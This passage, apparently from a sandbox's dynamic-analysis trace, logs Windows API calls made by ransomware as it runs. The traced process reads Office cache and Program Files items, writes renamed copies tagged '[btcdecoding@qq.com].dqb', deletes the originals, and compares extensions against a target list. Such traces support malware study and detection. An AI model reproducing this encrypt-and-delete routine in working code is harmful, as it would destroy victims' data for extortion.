users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.936] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.936] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.936] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.936] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.936] GetLastError () returned 0x0 [0035.936] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x412b, lpOverlapped=0x0) returned 1 [0035.938] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0035.939] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.939] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.939] SetEndOfFile (hFile=0x170) returned 1 [0035.939] CloseHandle (hObject=0x170) returned 1 [0035.940] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.940] SetEndOfFile (hFile=0x1a0) returned 1 [0035.941] CloseHandle (hObject=0x1a0) returned 1 [0035.941] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.941] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.941] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.941] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.941] lstrlenW (lpString=".doc") returned 4 [0035.941] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.941] lstrlenW (lpString=".docx") returned 5 [0035.942] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.942] lstrlenW (lpString=".pdf") returned 4 [0035.942] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString=".xls") returned 4 [0035.942] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString=".xlsx") returned 5 [0035.942] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.942] lstrlenW (lpString=".ppt") returned 4 [0035.942] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.942] lstrlenW (lpString=".zip") returned 4 [0035.942] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.942] lstrlenW (lpString=".rar") returned 4 [0035.942] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString=".bz2") returned 4 [0035.942] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString=".7z") returned 3 [0035.942] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.942] lstrlenW (lpString=".dbf") returned 4 [0035.942] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.942] lstrlenW (lpString=".1cd") returned 4 [0035.942] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.942] lstrlenW (lpString=".jpg") returned 4 [0035.942] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.942] lstrlenW (lpString=".doc") returned 4 [0035.942] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.942] lstrlenW (lpString=".docx") returned 5 [0035.942] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.942] lstrlenW (lpString=".pdf") returned 4 [0035.943] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString=".xls") returned 4 [0035.943] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString=".xlsx") returned 5 [0035.943] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.943] lstrlenW (lpString=".ppt") returned 4 [0035.943] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.943] lstrlenW (lpString=".zip") returned 4 [0035.943] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.943] lstrlenW (lpString=".rar") returned 4 [0035.943] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString=".bz2") returned 4 [0035.943] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString=".7z") returned 3 [0035.943] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.943] lstrlenW (lpString=".dbf") returned 4 [0035.943] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.943] lstrlenW (lpString=".1cd") returned 4 [0035.943] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.943] lstrlenW (lpString=".jpg") returned 4 [0035.943] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.943] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.943] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.943] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.944] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=4274) returned 1 [0035.944] CloseHandle (hObject=0x1a0) returned 1 [0035.944] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0035.944] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.945] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.945] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.945] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.945] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.945] GetLastError () returned 0x0 [0035.945] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0036.282] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0036.283] ReadFile (in: hFile=0x1a0, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.283] WriteFile (in: hFile=0x170, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0036.283] SetEndOfFile (hFile=0x170) returned 1 [0036.283] CloseHandle (hObject=0x170) returned 1 [0036.284] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.284] SetEndOfFile (hFile=0x1a0) returned 1 [0036.285] CloseHandle (hObject=0x1a0) returned 1 [0036.285] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.285] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0036.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.285] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.285] lstrlenW (lpString=".doc") returned 4 [0036.285] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.285] lstrlenW (lpString=".docx") returned 5 [0036.285] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.285] lstrlenW (lpString=".pdf") returned 4 [0036.285] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.285] lstrlenW (lpString=".xls") returned 4 [0036.285] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.285] lstrlenW (lpString=".xlsx") returned 5 [0036.285] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.285] lstrlenW (lpString=".ppt") returned 4 [0036.285] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString=".zip") returned 4 [0036.286] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.286] lstrlenW (lpString=".rar") returned 4 [0036.286] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString=".bz2") returned 4 [0036.286] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString=".7z") returned 3 [0036.286] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString=".dbf") returned 4 [0036.286] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString=".1cd") returned 4 [0036.286] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString=".jpg") returned 4 [0036.286] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString=".doc") returned 4 [0036.286] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString=".docx") returned 5 [0036.286] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.286] lstrlenW (lpString=".pdf") returned 4 [0036.286] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString=".xls") returned 4 [0036.286] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString=".xlsx") returned 5 [0036.286] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.286] lstrlenW (lpString=".ppt") returned 4 [0036.286] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.286] lstrlenW (lpString=".zip") returned 4 [0036.286] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.286] lstrlenW (lpString=".rar") returned 4 [0036.287] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.287] lstrlenW (lpString=".bz2") returned 4 [0036.287] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.287] lstrlenW (lpString=".7z") returned 3 [0036.287] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.287] lstrlenW (lpString=".dbf") returned 4 [0036.287] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.287] lstrlenW (lpString=".1cd") returned 4 [0036.287] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.287] lstrlenW (lpString=".jpg") returned 4 [0036.287] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.287] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.287] lstrlenW (lpString="boxed-delete.avi") returned 16 [0036.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0036.750] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=31744) returned 1 [0036.750] CloseHandle (hObject=0x174) returned 1 [0036.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0036.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString=".doc") returned 4 [0036.751] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString=".docx") returned 5 [0036.751] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0036.751] lstrlenW (lpString=".pdf") returned 4 [0036.751] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString=".xls") returned 4 [0036.751] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString=".xlsx") returned 5 [0036.751] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0036.751] lstrlenW (lpString=".ppt") returned 4 [0036.751] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString=".zip") returned 4 [0036.751] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString=".rar") returned 4 [0036.751] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString=".bz2") returned 4 [0036.751] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString=".7z") returned 3 [0036.751] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString=".dbf") returned 4 [0036.751] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString=".1cd") returned 4 [0036.751] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString=".jpg") returned 4 [0036.751] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.751] lstrlenW (lpString=".doc") returned 4 [0036.751] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString=".docx") returned 5 [0036.752] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0036.752] lstrlenW (lpString=".pdf") returned 4 [0036.752] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString=".xls") returned 4 [0036.752] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString=".xlsx") returned 5 [0036.752] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0036.752] lstrlenW (lpString=".ppt") returned 4 [0036.752] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.752] lstrlenW (lpString=".zip") returned 4 [0036.752] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString=".rar") returned 4 [0036.752] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString=".bz2") returned 4 [0036.752] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString=".7z") returned 3 [0036.752] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.752] lstrlenW (lpString=".dbf") returned 4 [0036.752] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.752] lstrlenW (lpString=".1cd") returned 4 [0036.752] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0036.752] lstrlenW (lpString=".jpg") returned 4 [0036.752] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.752] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0036.752] lstrlenW (lpString="correct.avi") returned 11 [0036.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0036.753] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=197120) returned 1 [0036.753] CloseHandle (hObject=0x174) returned 1 [0036.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0036.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.755] lstrlenW (lpString=".doc") returned 4 [0036.755] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0036.755] lstrlenW (lpString=".docx") returned 5 [0036.755] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0036.755] lstrlenW (lpString=".pdf") returned 4 [0036.755] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0036.755] lstrlenW (lpString=".xls") returned 4 [0036.755] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0036.755] lstrlenW (lpString=".xlsx") returned 5 [0036.755] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0036.756] lstrlenW (lpString=".ppt") returned 4 [0036.756] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.756] lstrlenW (lpString=".zip") returned 4 [0036.756] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString=".rar") returned 4 [0036.756] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString=".bz2") returned 4 [0036.756] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString=".7z") returned 3 [0036.756] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0036.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.756] lstrlenW (lpString=".dbf") returned 4 [0036.756] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.756] lstrlenW (lpString=".1cd") returned 4 [0036.756] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.756] lstrlenW (lpString=".jpg") returned 4 [0036.756] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0036.756] lstrlenW (lpString=".doc") returned 4 [0036.756] lstrcmpiW 